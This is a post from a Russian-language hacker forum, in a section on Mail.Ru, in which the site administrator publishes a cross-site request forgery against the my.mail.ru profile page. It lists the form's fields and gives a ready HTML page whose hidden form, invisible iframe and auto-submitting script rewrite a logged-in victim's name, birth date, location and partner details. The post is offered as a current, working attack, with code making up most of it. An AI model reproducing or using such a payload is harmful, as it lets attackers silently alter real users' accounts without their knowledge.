Stas'M Corp.
Главная | XSRF изменение анкеты (актуально) - Форум | Регистрация | Вход
 
Пятница, 06.12.2019, 18:39
Приветствую Вас Гость | RSS
| ENG | RUS
Форма входа

Информация о тебе:

IP-адрес: 3.229.122.219
Браузер: Неизвестен
Основные разделы
Мини-чат
Loading Загрузка сообщений...
Наш опрос
Каким поисковиком пользуетесь?

Всего ответов: 754
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Модератор форума: Administrator, Phantom, b@bskEnízm  
Форум » Хакерский форум » Mail.Ru » XSRF изменение анкеты (актуально)
XSRF изменение анкеты (актуально)
AdministratorДата: Понедельник, 30.05.2011, 17:59 | Сообщение # 1
Admin
Группа: Администраторы
Сообщений: 90
Награды: 39
Репутация: 50
Статус: Offline
XSRF уязвимость позволяет атакующему изменить личные данные пользователя.
Создаётся специальный HTML файл с формой и с использованием JavaScript.

Образец запроса:

URL:http://my.mail.ru/my/userinfo
Метод:POST
Кодировка:Windows-1251
Поля формы:
domain<пустое>
mra1
backhttp://my.mail.ru/my/userinfo
IDUprPnBej
Count1
NickNameНикнейм
FirstNameИмя
LastNameФамилия
MaidenNameДевичья фамилия
BirthDayДень рождения
BirthMonthМесяц рождения
BirthYearГод рождения
ShowAgeПоказывать возраст (0 или 1)
SexПол (0 = нет, 1 = м, 2 = ж)
Mrim.CountryСтрана (24 = Россия)
Mrim.RegionГород (25 = Москва)
geo_countryIdСтрана (24 = Россия)
geo_regionId999999
geo_cityIdГород (25 = Москва)
your_townГород, страна и т.п. в текстовом виде
geo_countryundefined
MaritalStatusСемейное положение (0..14)
PartnerEmailМейл партнёра
PartnerNickНик партнёра
ShowStatПоказывать при поиске (on или off)
SaveUInfo1

Образец HTML кода, использующего эту уязвимость:

Code
<form id="userinfo" method="POST" action="http://my.mail.ru/my/userinfo" target="userinfo_to">
<input type="hidden" name="domain" value="">
<input type="hidden" name="mra" value="1">
<input type="hidden" name="back" value="http://my.mail.ru/my/userinfo">
<input type="hidden" name="ID" value="UprPnBej">
<input type="hidden" name="Count" value="1">
<input type="hidden" name="NickName" value="Barak Оbama">
<input type="hidden" name="FirstName" value="Барак">
<input type="hidden" name="LastName" value="Обама">
<input type="hidden" name="MaidenName" value="">
<input type="hidden" name="BirthDay" value="4">
<input type="hidden" name="BirthMonth" value="8">
<input type="hidden" name="BirthYear" value="1961">
<input type="hidden" name="ShowAge" value="1">
<input type="hidden" name="Sex" value="1">
<input type="hidden" name="Mrim.Country" value="24">
<input type="hidden" name="Mrim.Region" value="25">
<input type="hidden" name="geo_countryId" value="24">
<input type="hidden" name="geo_regionId" value="999999">
<input type="hidden" name="geo_cityId" value="25">
<input type="hidden" name="your_town" value="г. Мунтаун, Луна, Солнечная система">
<input type="hidden" name="geo_country" value="undefined">
<input type="hidden" name="MaritalStatus" value="13">
<input type="hidden" name="PartnerEmail" value="support@corp.mail.ru">
<input type="hidden" name="PartnerNick" value="Служба поддержки">
<input type="hidden" name="ShowStat" value="on">
<input type="hidden" name="SaveUInfo" value="1">
<input type="submit" value="Submit">
</form>
<iframe name="userinfo_to" width="0" height="0" scrolling="no" frameborder="0"></iframe>
<script type="text/javascript">
document.getElementById('userinfo').submit();
</script>


Stas'M
 
Форум » Хакерский форум » Mail.Ru » XSRF изменение анкеты (актуально)
  • Страница 1 из 1
  • 1
Поиск:

Веб приложения
Пожертвование / Donate
WMWebMoney transferZ358077191062
WMWebMoney transferE208225402366
WMWebMoney transferP303537803958
WMWebMoney transferB345247247920
WUWestern Union transferuse feedback form
Друзья сайта

Просим вас посещать сайты наших друзей! Они достойны такого же внимания как и мы!

Пользователи

Пользователи онлайн:
Статистика

Copyright © Stas'M Corp. 2019Хостинг от uCoz